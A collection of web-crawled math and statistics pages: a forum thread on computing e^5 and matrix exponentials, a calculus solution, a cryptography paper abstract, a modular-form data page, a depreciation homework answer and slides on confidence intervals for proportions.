SERVING THE QUANTITATIVE FINANCE COMMUNITY • 1 • 3 • 4 • 5 • 6 • 7 • 37 Cuchulainn Posts: 61624 Joined: July 16th, 2004, 7:38 am Location: Amsterdam Contact: ### exp(5) = $e^5$ QuoteOriginally posted by: CuchulainnYou can use the fact that exp(x+y) = exp(x)exp(y) (school A level?) and induction to show exp(5) = exp(1)^5 = exp(2)^2*exp(1) == exp(2)*exp(2)*exp(1)Looks like a special case of algos from Pingala's Chandah-sutra. http://www.datasimfinancial.com http://www.datasim.nl Every Time We Teach a Child Something, We Keep Him from Inventing It Himself Jean Piaget SierpinskyJanitor Posts: 1069 Joined: March 29th, 2005, 12:55 pm ### exp(5) = $e^5$ this way? Last edited by SierpinskyJanitor on September 15th, 2011, 10:00 pm, edited 1 time in total. Cuchulainn Posts: 61624 Joined: July 16th, 2004, 7:38 am Location: Amsterdam Contact: ### exp(5) = $e^5$ QuoteOriginally posted by: outrunQuoteOriginally posted by: CuchulainnQuoteOriginally posted by: CuchulainnYou can use the fact that exp(x+y) = exp(x)exp(y) (school A level?) and induction to show exp(5) = exp(1)^5 = exp(2)^2*exp(1) == exp(2)*exp(2)*exp(1)Looks like a special case of algos from Pingala's Chandah-sutra.thats binary expansion used in exponentiation by squaringYes Sir, that's it. A similar and common variation is to compute exp(f(x))) where f(x) is an integral f(x) = Integral([0,x], g) where g is a function. Typically, the x vars are monotonic increasing mesh points. But instead of 'exponent' decomposition we get some interval decomposition? Last edited by Cuchulainn on September 15th, 2011, 10:00 pm, edited 1 time in total. http://www.datasimfinancial.com http://www.datasim.nl Every Time We Teach a Child Something, We Keep Him from Inventing It Himself Jean Piaget Cuchulainn Posts: 61624 Joined: July 16th, 2004, 7:38 am Location: Amsterdam Contact: ### exp(5) = $e^5$ A good example is when you remove lower-order terms in an ODE. Then "wlog"a(x)dv/dx + b(x)v = f(x)can be reduced to the formA(x)d(B(x)v)/dx = F(x)by a suitable integrating factor which in general is the exponential of some integral. Sometimes you can evaluate it exactly, e.g. when a(X) = x^2, b(x) = x. But in general, we get exponential of a sum of discretre function values, many of which can be reused. I could use STL algo partial_sum().For 2nd order ODE it is nice when we can use the same technique and remove the convection term.au_xx + bu_x = f==>av_x + bv = fu_x = v Last edited by Cuchulainn on September 17th, 2011, 10:00 pm, edited 1 time in total. http://www.datasimfinancial.com http://www.datasim.nl Every Time We Teach a Child Something, We Keep Him from Inventing It Himself Jean Piaget supernova Posts: 12 Joined: October 19th, 2003, 3:44 am ### exp(5) = $e^5$ (1+5/n)^n, take n enough to achieve the desired decimal accuracy katastrofa Posts: 8992 Joined: August 16th, 2007, 5:36 am Location: Alpha Centauri ### exp(5) = $e^5$ I would multiply (e*e)^2*e in columns like in primary school - it goes very fast (but my husband told me not to admit to people how many digits of Euler's number I know by heart ;-/)2.71828 will do :-)BTW, there's a similar problem with convergence of the exp function in physics, when one wants to calculate the exponent of a matrix (e.g. the evolution operator). What's usually done is first calculating B = exp(A/n) and then B^n... or using a Padé approximant.a Last edited by katastrofa on September 25th, 2011, 10:00 pm, edited 1 time in total. Cuchulainn Posts: 61624 Joined: July 16th, 2004, 7:38 am Location: Amsterdam Contact: ### exp(5) = $e^5$ QuoteOriginally posted by: katastrofaI would multiply (e*e)^2*e in columns like in primary school - it goes very fast (but my husband told me not to admit to people how many digits of Euler's number I know by heart ;-/)2.71828 will do :-)BTW, there's a similar problem with convergence of the exp function in physics, when one wants to calculate the exponent of a matrix (e.g. the evolution operator). What's usually done is first calculating B = exp(A/n) and then B^n... or using a Padé approximant.a19 dubious ways to calculate exp(A) http://www.datasimfinancial.com http://www.datasim.nl Every Time We Teach a Child Something, We Keep Him from Inventing It Himself Jean Piaget katastrofa Posts: 8992 Joined: August 16th, 2007, 5:36 am Location: Alpha Centauri ### exp(5) = $e^5$ QuoteOriginally posted by: Cuchulainn19 dubious ways to calculate exp(A)Yup, p.10, Method 3. Scaling and squaring: exp(A/m) -> Taylor expansion/Padé approximant -> (.)^m usually works best - at least for me (or A is normal and can be diagonalised). Sorry, I hijacked the thread :-)a Last edited by katastrofa on September 26th, 2011, 10:00 pm, edited 1 time in total. Cuchulainn Posts: 61624 Joined: July 16th, 2004, 7:38 am Location: Amsterdam Contact: ### exp(5) = $e^5$ QuoteOriginally posted by: katastrofaQuoteOriginally posted by: Cuchulainn19 dubious ways to calculate exp(A)Yup, p.10, Method 3. Scaling and squaring: exp(A/m) -> Taylor expansion/Padé approximant -> (.)^m usually works best - at least for me (or A is normal and can be diagonalised). Sorry, I hijacked the thread :-)aGreat! Thanks for the input http://www.datasimfinancial.com http://www.datasim.nl Every Time We Teach a Child Something, We Keep Him from Inventing It Himself Jean Piaget Cuchulainn Posts: 61624 Joined: July 16th, 2004, 7:38 am Location: Amsterdam Contact: ### exp(5) = $e^5$ QuoteOriginally posted by: supernova(1+5/n)^n, take n enough to achieve the desired decimal accuracyIs there a fast way to compute (1+1/n)^nto a given accuracy? (using a Cauchy sequence?). Then we can use the Pingala's Chandah-sutra technique already alluded to.The interview allows 5 minutes. Last edited by Cuchulainn on September 26th, 2011, 10:00 pm, edited 1 time in total. http://www.datasimfinancial.com http://www.datasim.nl Every Time We Teach a Child Something, We Keep Him from Inventing It Himself Jean Piaget DevonFangs Posts: 3004 Joined: November 9th, 2009, 1:49 pm ### exp(5) = $e^5$ QuoteOriginally posted by: katastrofaBTW, there's a similar problem with convergence of the exp function in physics, when one wants to calculate the exponent of a matrix (e.g. the evolution operator). What's usually done is first calculating B = exp(A/n) and then B^n... or using a Padé approximant.aNot that it's really relevant, but this reminds me of the Lie Trotter formula. One can construct a naturally time ordered evolution operator and integrate Schroedinger eqn efficiently from there in a fancy way. Polter Posts: 2526 Joined: April 29th, 2008, 4:55 pm ### exp(5) = $e^5$ QuoteOriginally posted by: CuchulainnQuoteOriginally posted by: supernova(1+5/n)^n, take n enough to achieve the desired decimal accuracyIs there a fast way to compute (1+1/n)^nto a given accuracy? (using a Cauchy sequence?). Then we can use the Pingala's Chandah-sutra technique already alluded to.The interview allows 5 minutes.Rough idea:Denote our ErrorOfApproximation function by f(x; n) := Power series expansion of the above, accurate to order x^3 (that's not very high, but it's probably a good idea to sacrifice some accuracy and settle for lower order in an interview setting ;]), gives:So, for our x=1 the error-of-approximation behaves roughly like:From this one can see that to reduce the order of approximation error by magnitude "m" we have to increase "n" roughly by the same "m" (a nice inverse relationship).Some numerical illustration of the above:f(1; 10) = 0.124539f(1; 100) = 0.013468f(1; 1000) = 0.0013579(and we have to stop right here). Last edited by Polter on September 27th, 2011, 10:00 pm, edited 1 time in total.
2020-04-10 09:28:49
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7909892797470093, "perplexity": 5700.078940095724}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585371893683.94/warc/CC-MAIN-20200410075105-20200410105605-00398.warc.gz"}
http://www.gradesaver.com/textbooks/math/calculus/calculus-10th-edition/chapter-2-differentiation-2-5-exercises-page-146/45
## Calculus 10th Edition $\dfrac{d^2y}{dx^2}=-\dfrac{4}{y^3}.$ First Derivative: $\dfrac{d}{dx}(x^2)+\dfrac{d}{dx}(y^2)=\dfrac{d}{dx}(4)\rightarrow$ $2x+\dfrac{dy}{dx}(2y)=0\rightarrow$ $\dfrac{dy}{dx}=-\dfrac{x}{y}$ Second derivative: $\dfrac{d}{dx}(\dfrac{dy}{dx})=\dfrac{d}{dx}(-\dfrac{x}{y})\rightarrow$ $\dfrac{d^2y}{dx^2}=-\dfrac{y-(\dfrac{dy}{dx})(x)}{y^2}=-\dfrac{y^2+x^2}{y^3}=-\dfrac{4}{y^3}.$
2017-10-18 15:22:52
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9966131448745728, "perplexity": 5993.1562636662875}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-43/segments/1508187822992.27/warc/CC-MAIN-20171018142658-20171018162658-00353.warc.gz"}
https://eprint.iacr.org/2015/1067
#### Paper 2015/1067 Vladimir Kolesnikov and Alex J. Malozemoff ##### Abstract The covert security model (Aumann and Lindell, TCC 2007) offers an important security/efficiency trade-off: a covert player may arbitrarily cheat, but is caught with a certain fixed probability. This permits more efficient protocols than the malicious setting while still giving meaningful security guarantees. However, one drawback is that cheating cannot be proven to a third party, which prevents the use of covert protocols in many practical settings. Recently, Asharov and Orlandi (ASIACRYPT 2012) enhanced the covert model by allowing the honest player to generate a \emph{proof of cheating}, checkable by any third party. Their model, which we call the PVC (\emph{publicly verifiable covert}) model, offers a very compelling trade-off. Asharov and Orlandi (AO) propose a practical protocol in the PVC model, which, however, relies on a specific expensive oblivious transfer (OT) protocol incompatible with OT extension. In this work, we improve the performance of the PVC model by constructing a PVC-compatible OT extension as well as making several practical improvements to the AO protocol. As compared to the state-of-the-art OT extension-based two-party covert protocol, our PVC protocol adds relatively little: four signatures and an $\approx 67\%$ wider OT extension matrix. This is a significant improvement over the AO protocol, which requires public-key-based OTs per input bit. We present detailed estimates showing (up to orders of magnitude) concrete performance improvements over the AO protocol and a recent malicious protocol. Note: This is the full version of the proceedings version published at ASIACRYPT 2015. Available format(s) Category Cryptographic protocols Publication info A major revision of an IACR publication in ASIACRYPT 2015 Keywords secure computationpublicly verifiable covert security Contact author(s) amaloz @ cs umd edu History Short URL https://ia.cr/2015/1067 CC BY BibTeX @misc{cryptoeprint:2015/1067, author = {Vladimir Kolesnikov and Alex J. Malozemoff},
2022-11-30 15:07:10
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.37341153621673584, "perplexity": 6768.94117110041}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710764.12/warc/CC-MAIN-20221130124353-20221130154353-00577.warc.gz"}
https://www.lmfdb.org/ModularForm/GL2/Q/holomorphic/1323/2/a/y/
Properties Label 1323.2.a.y Level $1323$ Weight $2$ Character orbit 1323.a Self dual yes Analytic conductor $10.564$ Analytic rank $1$ Dimension $3$ CM no Inner twists $1$ Related objects Newspace parameters Level: $$N$$ $$=$$ $$1323 = 3^{3} \cdot 7^{2}$$ Weight: $$k$$ $$=$$ $$2$$ Character orbit: $$[\chi]$$ $$=$$ 1323.a (trivial) Newform invariants Self dual: yes Analytic conductor: $$10.5642081874$$ Analytic rank: $$1$$ Dimension: $$3$$ Coefficient field: 3.3.321.1 Defining polynomial: $$x^{3} - x^{2} - 4 x + 1$$ Coefficient ring: $$\Z[a_1, a_2]$$ Coefficient ring index: $$1$$ Twist minimal: no (minimal twist has level 189) Fricke sign: $$1$$ Sato-Tate group: $\mathrm{SU}(2)$ $q$-expansion Coefficients of the $$q$$-expansion are expressed in terms of a basis $$1,\beta_1,\beta_2$$ for the coefficient ring described below. We also show the integral $$q$$-expansion of the trace form. $$f(q)$$ $$=$$ $$q + ( -1 + \beta_{1} ) q^{2} + ( 2 - \beta_{1} + \beta_{2} ) q^{4} -\beta_{2} q^{5} + ( -4 + \beta_{1} - 2 \beta_{2} ) q^{8} +O(q^{10})$$ $$q + ( -1 + \beta_{1} ) q^{2} + ( 2 - \beta_{1} + \beta_{2} ) q^{4} -\beta_{2} q^{5} + ( -4 + \beta_{1} - 2 \beta_{2} ) q^{8} + ( 1 - \beta_{1} + \beta_{2} ) q^{10} + ( -2 - \beta_{1} ) q^{11} + ( -1 + 2 \beta_{1} + \beta_{2} ) q^{13} + ( 5 - 4 \beta_{1} + \beta_{2} ) q^{16} + ( 1 - \beta_{1} + 2 \beta_{2} ) q^{17} + ( -1 - \beta_{1} + \beta_{2} ) q^{19} + ( -5 + 2 \beta_{1} ) q^{20} + ( -1 - 2 \beta_{1} - \beta_{2} ) q^{22} + ( -2 - \beta_{1} - \beta_{2} ) q^{23} + ( -1 - \beta_{1} - 2 \beta_{2} ) q^{25} + ( 6 + \beta_{2} ) q^{26} + ( -4 + \beta_{1} + 2 \beta_{2} ) q^{29} + ( 3 - 2 \beta_{1} - \beta_{2} ) q^{31} + ( -10 + 4 \beta_{1} - \beta_{2} ) q^{32} + ( -6 + 3 \beta_{1} - 3 \beta_{2} ) q^{34} + ( -3 - \beta_{1} - 2 \beta_{2} ) q^{37} + ( -3 - 2 \beta_{2} ) q^{38} + ( 9 - 3 \beta_{1} ) q^{40} + ( 2 - 5 \beta_{1} - \beta_{2} ) q^{41} + ( -4 + 3 \beta_{1} ) q^{43} -\beta_{2} q^{44} -3 \beta_{1} q^{46} + ( 2 + 4 \beta_{1} + \beta_{2} ) q^{47} + ( -3 \beta_{1} + \beta_{2} ) q^{50} + ( -5 + 3 \beta_{1} - 3 \beta_{2} ) q^{52} + ( -7 - 2 \beta_{1} + \beta_{2} ) q^{53} + ( -1 + \beta_{1} + 2 \beta_{2} ) q^{55} + ( 5 - 2 \beta_{1} - \beta_{2} ) q^{58} + ( -5 - \beta_{1} - \beta_{2} ) q^{59} + ( -1 + 2 \beta_{1} - 2 \beta_{2} ) q^{61} + ( -8 + 2 \beta_{1} - \beta_{2} ) q^{62} + ( 13 - 3 \beta_{1} + 3 \beta_{2} ) q^{64} + ( -2 - \beta_{1} + 3 \beta_{2} ) q^{65} + ( 4 + \beta_{1} - \beta_{2} ) q^{67} + ( 16 - 7 \beta_{1} + 2 \beta_{2} ) q^{68} + ( 3 - 3 \beta_{1} + 3 \beta_{2} ) q^{71} + ( -5 \beta_{1} + 2 \beta_{2} ) q^{73} + ( 2 - 5 \beta_{1} + \beta_{2} ) q^{74} + ( 7 - 3 \beta_{1} ) q^{76} + ( 2 + 3 \beta_{1} + 3 \beta_{2} ) q^{79} + ( -8 + 5 \beta_{1} - 3 \beta_{2} ) q^{80} + ( -16 + \beta_{1} - 4 \beta_{2} ) q^{82} + ( 6 \beta_{1} + 3 \beta_{2} ) q^{83} + ( -9 + 3 \beta_{1} + 3 \beta_{2} ) q^{85} + ( 13 - 4 \beta_{1} + 3 \beta_{2} ) q^{86} + ( 3 + 3 \beta_{1} + 3 \beta_{2} ) q^{88} + ( -3 - 4 \beta_{2} ) q^{89} + ( -5 + 2 \beta_{1} - \beta_{2} ) q^{92} + ( 9 + 3 \beta_{1} + 3 \beta_{2} ) q^{94} + ( -5 + 2 \beta_{1} + 3 \beta_{2} ) q^{95} + ( 6 - 2 \beta_{1} + 2 \beta_{2} ) q^{97} +O(q^{100})$$ $$\operatorname{Tr}(f)(q)$$ $$=$$ $$3q - 2q^{2} + 4q^{4} + q^{5} - 9q^{8} + O(q^{10})$$ $$3q - 2q^{2} + 4q^{4} + q^{5} - 9q^{8} + q^{10} - 7q^{11} - 2q^{13} + 10q^{16} - 5q^{19} - 13q^{20} - 4q^{22} - 6q^{23} - 2q^{25} + 17q^{26} - 13q^{29} + 8q^{31} - 25q^{32} - 12q^{34} - 8q^{37} - 7q^{38} + 24q^{40} + 2q^{41} - 9q^{43} + q^{44} - 3q^{46} + 9q^{47} - 4q^{50} - 9q^{52} - 24q^{53} - 4q^{55} + 14q^{58} - 15q^{59} + q^{61} - 21q^{62} + 33q^{64} - 10q^{65} + 14q^{67} + 39q^{68} + 3q^{71} - 7q^{73} + 18q^{76} + 6q^{79} - 16q^{80} - 43q^{82} + 3q^{83} - 27q^{85} + 32q^{86} + 9q^{88} - 5q^{89} - 12q^{92} + 27q^{94} - 16q^{95} + 14q^{97} + O(q^{100})$$ Basis of coefficient ring in terms of a root $$\nu$$ of $$x^{3} - x^{2} - 4 x + 1$$: $$\beta_{0}$$ $$=$$ $$1$$ $$\beta_{1}$$ $$=$$ $$\nu$$ $$\beta_{2}$$ $$=$$ $$\nu^{2} - \nu - 3$$ $$1$$ $$=$$ $$\beta_0$$ $$\nu$$ $$=$$ $$\beta_{1}$$ $$\nu^{2}$$ $$=$$ $$\beta_{2} + \beta_{1} + 3$$ Embeddings For each embedding $$\iota_m$$ of the coefficient field, the values $$\iota_m(a_n)$$ are shown below. For more information on an embedded modular form you can click on its label. Label $$\iota_m(\nu)$$ $$a_{2}$$ $$a_{3}$$ $$a_{4}$$ $$a_{5}$$ $$a_{6}$$ $$a_{7}$$ $$a_{8}$$ $$a_{9}$$ $$a_{10}$$ 1.1 −1.69963 0.239123 2.46050 −2.69963 0 5.28799 −1.58836 0 0 −8.87636 0 4.28799 1.2 −0.760877 0 −1.42107 3.18194 0 0 2.60301 0 −2.42107 1.3 1.46050 0 0.133074 −0.593579 0 0 −2.72665 0 −0.866926 $$n$$: e.g. 2-40 or 990-1000 Significant digits: Format: Complex embeddings Normalized embeddings Satake parameters Satake angles Atkin-Lehner signs $$p$$ Sign $$3$$ $$-1$$ $$7$$ $$-1$$ Inner twists This newform does not admit any (nontrivial) inner twists. Twists By twisting character orbit Char Parity Ord Mult Type Twist Min Dim 1.a even 1 1 trivial 1323.2.a.y 3 3.b odd 2 1 1323.2.a.z 3 7.b odd 2 1 1323.2.a.x 3 7.d odd 6 2 189.2.e.f yes 6 21.c even 2 1 1323.2.a.ba 3 21.g even 6 2 189.2.e.e 6 63.i even 6 2 567.2.h.i 6 63.k odd 6 2 567.2.g.i 6 63.s even 6 2 567.2.g.h 6 63.t odd 6 2 567.2.h.h 6 By twisted newform orbit Twist Min Dim Char Parity Ord Mult Type 189.2.e.e 6 21.g even 6 2 189.2.e.f yes 6 7.d odd 6 2 567.2.g.h 6 63.s even 6 2 567.2.g.i 6 63.k odd 6 2 567.2.h.h 6 63.t odd 6 2 567.2.h.i 6 63.i even 6 2 1323.2.a.x 3 7.b odd 2 1 1323.2.a.y 3 1.a even 1 1 trivial 1323.2.a.z 3 3.b odd 2 1 1323.2.a.ba 3 21.c even 2 1 Hecke kernels This newform subspace can be constructed as the intersection of the kernels of the following linear operators acting on $$S_{2}^{\mathrm{new}}(\Gamma_0(1323))$$: $$T_{2}^{3} + 2 T_{2}^{2} - 3 T_{2} - 3$$ $$T_{5}^{3} - T_{5}^{2} - 6 T_{5} - 3$$ $$T_{13}^{3} + 2 T_{13}^{2} - 19 T_{13} - 47$$ Hecke characteristic polynomials $p$ $F_p(T)$ $2$ $$-3 - 3 T + 2 T^{2} + T^{3}$$ $3$ $$T^{3}$$ $5$ $$-3 - 6 T - T^{2} + T^{3}$$ $7$ $$T^{3}$$ $11$ $$3 + 12 T + 7 T^{2} + T^{3}$$ $13$ $$-47 - 19 T + 2 T^{2} + T^{3}$$ $17$ $$-9 - 33 T + T^{3}$$ $19$ $$-29 - 4 T + 5 T^{2} + T^{3}$$ $23$ $$-9 + 3 T + 6 T^{2} + T^{3}$$ $29$ $$9 + 30 T + 13 T^{2} + T^{3}$$ $31$ $$69 + T - 8 T^{2} + T^{3}$$ $37$ $$-93 - 5 T + 8 T^{2} + T^{3}$$ $41$ $$387 - 105 T - 2 T^{2} + T^{3}$$ $43$ $$-101 - 12 T + 9 T^{2} + T^{3}$$ $47$ $$-9 - 42 T - 9 T^{2} + T^{3}$$ $53$ $$243 + 165 T + 24 T^{2} + T^{3}$$ $59$ $$81 + 66 T + 15 T^{2} + T^{3}$$ $61$ $$121 - 49 T - T^{2} + T^{3}$$ $67$ $$-31 + 53 T - 14 T^{2} + T^{3}$$ $71$ $$-243 - 108 T - 3 T^{2} + T^{3}$$ $73$ $$-981 - 134 T + 7 T^{2} + T^{3}$$ $79$ $$127 - 69 T - 6 T^{2} + T^{3}$$ $83$ $$-729 - 180 T - 3 T^{2} + T^{3}$$ $89$ $$-489 - 93 T + 5 T^{2} + T^{3}$$ $97$ $$24 + 16 T - 14 T^{2} + T^{3}$$
2021-01-24 19:06:32
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9741399884223938, "perplexity": 4496.428675371205}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-04/segments/1610703550617.50/warc/CC-MAIN-20210124173052-20210124203052-00600.warc.gz"}
https://www.transtutors.com/questions/depreciation-method-double-declining-balance-and-150-declining-balance-461290.htm
# Depreciation Method - Double Declining Balance and 150%-Declining Balance 1 answer below » P11-1 Depreciation Method The Winsey Company purchased equipment on January 2, 2010, for $700,000. The equipment has the following characteristics: Estimatesd service life 20 years Estimated residual value$50,000 100,000 hours 950,000 units of output During 2010 and 2011, the company used the machine for 4,500 and 5,500 hours respectively and purchased 40,000 and 60,000 units respectively. Compute he depreciation for 2010 and 2011 under each of the following methods: 5. Double-declining-balance 6. 150%-declining-balance 7. Compute the company's return on assets (net income divided by average total assets, as discussed in chapter 6) for each method for 2010 and 2011, assuming that income before depreciation is$100,000. For simplicity, use ending assets, and ignore interest, income taxes , and other assets. ## 1 Approved Answer kotla s 5 Ratings, (11 Votes) 1.) Straight-line: ($700,000 - $50,000) / 20 years =$32,500 per year Depreciation: 2010 2011 $32,500$32,500 2.) Hours worked: ($700,000 -$50,000) / 100000 years =$6.50 per year Depreciation: 2010 =$6.50 x 4,500 hours = $29,250 2011 =$6.50 x 5,500 hours = \$35,750 Looking for Something Else? Ask a Similar Question
2021-09-28 23:02:31
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.36670172214508057, "perplexity": 4966.150893880986}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780060908.47/warc/CC-MAIN-20210928214438-20210929004438-00666.warc.gz"}
http://slideplayer.com/slide/4129180/
# Sections 7-1 and 7-2 Review and Preview and Estimating a Population Proportion. ## Presentation on theme: "Sections 7-1 and 7-2 Review and Preview and Estimating a Population Proportion."— Presentation transcript: Sections 7-1 and 7-2 Review and Preview and Estimating a Population Proportion INFERENTIAL STATISTICS This chapter presents the beginnings of inferential statistics. The two major applications of inferential statistics involve the use of sample data to: 1.estimate the value of a population parameter, and 2.test some claim (or hypothesis) about a population. INFERENTIAL STATISTICS (CONTINUED) This chapter deals with the first of these. 1.We introduce methods for estimating values of these important population parameters: proportions, means, and variances. 2.We also present methods for determining sample sizes necessary to estimate those parameters. DEFINITIONS Estimator is a formula or process for using sample data to estimate a population parameter. Estimate is a specific value or range of values used to approximate a population parameter. Point estimate is a single value (or point) used to approximate a population parameter. ASSUMPTIONS FOR ESTIMATING A PROPORTION We begin this chapter by estimating a population proportion. We make the following assumptions: 1.The sample is simple random. 2.The conditions for the binomial distribution are satisfied. (See Section 5-3.) 3.There are at least 5 successes and 5 failures. NOTATION FOR PROPORTIONS p =population proportion sample proportion of x successes in a sample of size n. sample proportion of failures in a sample of size n. POINT ESTIMATE A point estimate is a single value (or point) used to approximate a population parameter. CONFIDENCE INTERVALS A confidence interval (or interval estimate) is a range (or an interval) of values used to estimate the true value of a population parameter. A confidence interval is sometimes abbreviated as CI. CONFIDENCE LEVEL A confidence level is the probability 1 − α (often expressed as the equivalent percentage value) that the confidence interval actually does contain the population parameter, assuming that the estimation process is repeated a large number of times. (The confidence level is also called the degree of confidence, or the confidence coefficient.) Some common confidence levels are: 90%,95%, or99% (α = 10%)(α = 5%)(α = 1%) A REMARK ABOUT CONFIDENCE INTERVALS Do not use the overlapping of confidence intervals as the basis for making final conclusions about the equality of proportions. CRITICAL VALUES 1.Under certain conditions, the sampling distribution of sample proportions can be approximated by a normal distribution. (See Figure 7-2.) 2.A z score associated with a sample proportion has a probability of α/2 of falling in the right tail of Figure 7-2. 3.The z score separating the right-tail is commonly denoted by z α/2, and is referred to as a critical value because it is on the borderline separating z scores that are likely to occur from those that are unlikely to occur. z = 0 Figure 7-2 Found from Table A-2. (corresponds to an area of 1 − α/2.) −z α/2 z α/2 α/2 CRITICAL VALUE A critical value is the number on the borderline separating sample statistics that are likely to occur from those that are unlikely to occur. The number z α/2 is a critical value that is a z score with the property that it separates an area of α/2 in the right tail of the standard normal distribution. (See Figure 7-2). NOTATION FOR CRITICAL VALUE The critical value z α/2 is the positive z value that is at the vertical boundary separating an area of α/2 in the right tail of the standard normal distribution. (The value of –z α/2 is at the vertical boundary for the area of α/2 in the left tail). The subscript α/2 is simply a reminder that the z score separates an area of α/2 in the right tail of the standard normal distribution. FINDING z α/2 FOR 95% DEGREE OF CONFIDENCE −z α/2 = −1.96z α/2 = 1.96 α = 5% = 0.05 α/2 = 2.5% = 0.025 α/2 = 0.025 Confidence Level: 95% critical values MARGIN OF ERROR MARGIN OF ERROR OF THE ESTIMATE FOR p NOTE: n is the size of the sample. CONFIDENCE INTERVAL FOR THE POPULATION PROPORTION p ROUND-OFF RULE FOR CONFIDENCE INTERVALS Round the confidence interval limits to three significant digits. PROCEDURE FOR CONSTRUCTING A CONFIDENCE INTERVAL CONFIDENCE INTERVAL LIMITS FINDING A CONFIDENCE INTERVAL USING TI-83/84 1.Select STAT. 2.Arrow right to TESTS. 3.Select A:1–PropZInt…. 4.Enter the number of successes as x. 5.Enter the size of the sample as n. 6.Enter the Confidence Level. 7.Arrow down to Calculate and press ENTER. NOTE: If the proportion is given, you must first compute the number of successes by multiplying the proportion (as a decimal) by the sample size. You must round to the nearest integer. SAMPLE SIZES FOR ESTIMATING A PROPORTION p ROUND-OFF RULE FOR DETERMINING SAMPLE SIZE In order to ensure that the required sample size is at least as large as it should be, if the computed sample size is not a whole number, round up to the next higher whole number. FINDING THE POINT ESTIMATE AND E FROM A CONFIDENCE INTERVAL Point estimate of p: Margin of error: CAUTION Do not use the overlapping of confidence intervals as the basis for making final conclusions about the equality of proportions. Download ppt "Sections 7-1 and 7-2 Review and Preview and Estimating a Population Proportion." Similar presentations
2017-11-20 01:17:12
